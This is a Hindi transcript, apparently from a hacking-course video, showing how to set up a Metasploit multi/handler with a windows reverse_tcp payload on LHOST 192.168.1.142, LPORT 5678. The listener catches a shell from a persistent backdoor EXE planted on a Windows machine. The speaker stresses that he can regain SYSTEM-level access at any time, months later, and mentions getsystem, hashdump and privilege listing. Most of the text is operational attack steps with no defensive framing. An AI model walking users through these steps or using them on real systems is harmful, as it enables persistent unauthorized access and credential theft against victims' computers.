पहले MSF कंसोल से स्टार्ट कर लो। तो उसके बाद यूज एक्सप्लोइट मल्टी हैंडलर सेट पेलोड दोबारा सेट करना है, एलोस्ट एलपोर्ट अब ये वाला सेट करना है। इसीलिए तो 5678 दिया था, क्योंकि वो जो EXE फाइल है वो इसी पोर्ट नंबर को बार बार ऑन करेगी और हमें भी लिसनिंग इसी पोर्ट नंबर पर ही करनी है, ठीक है। तो वो आई थिंक वो वायरस अभी भी चल रहा ही होगा उसके अंदर। यूज एक्सप्लॉइट मल्टी हैंडलर सेट पेलोड विंडोज /reverse _ TCP and set lhost 192.168.1.142 set lport 5678, yes, एक्सप्लोइट किया। नाउ यू कैन सी ऑटोमेटिकली ये सेशन 1 ओपन कर दिया, जबकि मैं विंडोज के अंदर नहीं गया और दोबारा से मैंने किसी वायरस पर क्लिक नहीं किया। अभी जस्ट राइट नाउ मैंने बस पेलोड को लोड किया और जैसे ही एक्सप्लोइट किया ऑटोमेटिक सब कुछ चल गया। क्यों? क्योंकि विंडोज के अंदर एक सर्विस चल रही है जो परसिस्टेंट और परमानेंट हो चुकी है ऑन पर्टिकुलर पोर्ट नंबर 5678 पर।
कि हाँ एक सर्विस है जो इस पर चल रही है और मैंने उसी पे सब अपना सेट करके, अब ये विंडोज वाला कभी भी शट डाउन कर दे, कभी भी रीस्टार्ट कर दे, 1 महीने बाद है, 2 महीने बाद, मैं जब चाहूं तब उस पर अटैक करके उसका एक्सेस ले सकता हूं। ठीक है, देखा, तो ये पूरा का पूरा हैक्ड है। SYSC सिस्टम ऑलरेडी रनिंग एज ए सिस्टम। और वो भी एंटी अथॉरिटी सिस्टम, एडमिन शैल, सॉरी समझ गए, हैश डंप काम नहीं कर रहा, बट एंटी अथॉरिटी सिस्टम है हमारे पास। गेट प्रिविलेज, प्रिविलेज बहुत सारे हैं। ठीक है, तो ये इस तरीके से आप अपना सिस्टम हैकिंग मॉड्यूल हम अपना कंप्लीट करते हैं, राइट। और भी कुछ सारी इसमें और ट्रिक्स हैं, मतलब और भी बहुत सारे वो हैं, बाकी मैं और चेंजेस कर दूंगा। वैसे तो सब कुछ ठीक ही था, बस थोड़ा सा हम गलत तरीका यूज कर रहे थे बार बार। तो आप जो है इस तरीके से अपना कंप्लीट कर लेना।